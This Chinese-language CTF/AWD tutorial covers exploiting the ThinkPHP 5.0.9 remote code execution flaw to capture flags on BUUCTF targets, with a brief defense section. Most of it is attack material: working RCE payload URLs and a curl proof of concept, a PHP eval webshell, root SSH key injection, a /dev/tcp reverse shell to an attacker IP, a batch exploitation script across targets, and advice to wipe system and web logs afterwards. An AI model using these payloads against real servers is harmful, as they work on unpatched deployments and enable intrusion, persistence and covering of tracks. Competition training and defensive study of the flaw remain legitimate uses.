ThinkPHP 5.0.9漏洞实战：手把手教你用POC拿下BUUCTF AWD赛题flag

ThinkPHP 5.0.9漏洞实战：从POC构造到竞赛攻防的艺术

在网络安全竞赛的战场上，AWD（Attack With Defense）模式总是最能考验选手综合能力的环节。当你面对一台运行着ThinkPHP 5.0.9的靶机时，如何快速识别漏洞、构造有效POC并最终拿下flag？这不仅需要技术储备，更需要一套系统化的实战思维。

1. 漏洞背景与竞赛环境准备

ThinkPHP作为国内广泛使用的PHP框架，其5.0.9版本存在多个高危漏洞，包括但不限于远程代码执行（RCE）。在BUUCTF等CTF竞赛中，这类漏洞常被设置为AWD赛题的突破口。

竞赛环境典型特征：

• 靶机通常开放80端口（Web服务）和22端口（SSH）
• Web根目录下可能存在/flag文件或环境变量中的flag
• 服务可能运行在容器中，权限受到限制
• 防守方需要同时修补自身漏洞并攻击其他队伍

提示：AWD模式下，时间就是分数。建议提前准备好常用漏洞的POC库，并熟悉快速验证方法。

2. 信息收集与漏洞识别

高效的漏洞利用始于精准的信息收集。面对未知靶机时，我通常会按照以下步骤进行快速侦查：

1. 框架指纹识别：

   curl -I http://target-ip/ | grep "X-Powered-By"

   或访问不存在的路由观察错误页面特征

2. 版本确认技巧：

   • 访问/public/index.php页面查看底部版本信息
   • 检查/robots.txt或/.git/目录泄露
   • 通过报错信息提取版本特征（如ThinkPHP 5.0.9的特定错误模板）

3. 敏感路径探测：

   common_paths = [ '/admin', '/upload', '/backup', '/runtime' ] for path in common_paths: response = requests.get(f'http://target-ip{path}') print(f"{path}: {response.status_code}")

当确认目标为ThinkPHP 5.0.9后，应立即联想到以下高危漏洞：

3. POC构造与实战利用

3.1 远程代码执行（RCE）利用

ThinkPHP 5.0.9最经典的RCE漏洞可通过以下两种方式触发：

方法一：函数调用链

http://target-ip/?s=index/\think\app/invokefunction &function=call_user_func_array &vars[0]=system &vars[1][]=cat /flag

方法二：模板注入

http://target-ip/?s=index/\think\View/display &content=<?php system('cat /flag');?>

实际操作时，我建议使用curl快速验证：

curl -G --data-urlencode 's=index/\think\app/invokefunction' \ --data-urlencode 'function=call_user_func_array' \ --data-urlencode 'vars[0]=system' \ --data-urlencode 'vars[1][]=ls -al /' \ http://target-ip/

3.2 权限维持与横向移动

拿到初步RCE后，成熟的选手会考虑建立持久化通道：

1. 写入Webshell：

   echo '<?php eval($_POST["cmd"]);?>' > /var/www/html/shell.php

2. SSH密钥注入（如果22端口开放）：

   mkdir -p /root/.ssh echo "your-public-key" >> /root/.ssh/authorized_keys

3. 反弹Shell：

   bash -c 'exec bash -i &>/dev/tcp/your-ip/4444 <&1'

注意：在实际比赛中，这些操作可能会触发防御机制，建议先检查/proc/sys/kernel/yama/ptrace_scope等安全配置。

4. 防御策略与漏洞修复

真正的AWD高手不仅会攻击，更要懂得即时防御。针对ThinkPHP 5.0.9漏洞，应立即：

1. 临时修复方案：

   // 在应用入口文件添加 if(strpos($_SERVER['REQUEST_URI'], 'think') !== false){ die('Access Denied'); }

2. 永久解决方案：

   • 升级到ThinkPHP 5.0.24及以上版本
   • 禁用危险函数：putenv,system,exec等
   • 设置open_basedir限制PHP访问范围

3. 监控措施：

   # 监控可疑文件创建 inotifywait -m /var/www/html -e create | while read path action file; do echo "Warning: $file created in $path" done

5. 竞赛技巧与经验分享

在真实的AWD比赛中，我总结出以下实战经验：

• 多POC准备：不同环境可能对特殊字符过滤程度不同，准备多个变种POC
• 自动化脚本：编写批量检测脚本，例如：

  import requests targets = ['team1.ip', 'team2.ip', 'team3.ip'] for target in targets: try: r = requests.get(f'http://{target}/?s=index/\\think\\app...', timeout=3) if 'flag{' in r.text: print(f"[+] {target}: {r.text[:50]}...") except: continue

• 日志清理：攻击后记得清理系统日志和Web访问日志
• 资源监控：使用top和netstat实时监控系统状态，发现异常进程

在最近一次比赛中，我发现虽然标准POC能获取flag，但某些队伍已经修补了常见漏洞。这时需要变通思路，比如通过phpinfo()寻找未禁用函数，或利用LD_PRELOAD等技巧绕过限制。

6. 漏洞原理深度解析

理解漏洞背后的机制能让你在比赛中随机应变。ThinkPHP 5.0.9的RCE本质上是路由解析与类自动加载机制的缺陷：

1. 路由解析流程：

   ?s=module/controller/action ↓ Route::parseUrl() ↓ App::module() ↓ Controller::action()

2. 漏洞触发点：

   • 未正确过滤的命名空间解析
   • 动态函数调用未做安全校验
   • 反序列化操作的风险

通过分析框架核心代码，可以找到更多可能的利用链。例如，在某些配置下，还可以利用：

?s=index/\think\Container/invokefunction &function=phpinfo &vars[]=-1

这种深入理解让你在标准POC失效时，依然能够构造出有效的攻击载荷。